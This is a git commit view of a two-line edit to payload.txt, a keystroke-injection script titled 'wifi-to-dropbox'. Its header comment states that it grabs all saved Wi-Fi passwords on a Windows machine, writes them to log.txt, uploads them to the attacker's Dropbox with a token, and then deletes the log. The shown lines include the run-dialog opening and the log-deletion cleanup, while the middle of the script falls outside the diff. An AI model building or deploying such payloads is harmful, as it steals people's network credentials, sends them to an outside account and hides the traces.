Update payload.txt

pull/132/head
Darren Kitchen 2022-08-30 09:42:24 -05:00 committed by GitHub
parent fd4176d6b1
commit 082b7ec4fd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -1,4 +1,4 @@
# ph3llin's wifi-to-dropbox
REM ph3llin's wifi-to-dropbox
REM GRABS ALL WIFI PASSWORDS ON WINDOWS CREATES log.txt ON DESKTOP THEN UPLOADS TO YOUR DROPBOX MUST EDIT DROP BOX TOKEN BELOW
DELAY 2000
GUI R
@ -34,7 +34,7 @@ DELAY 100
REM bottom code with delete log.txt and exit powershell
STRING cd $env:USERPROFILE\Desktop
ENTER
DELAY 100
DELAY 100
STRING del log.txt
ENTER
DELAY 100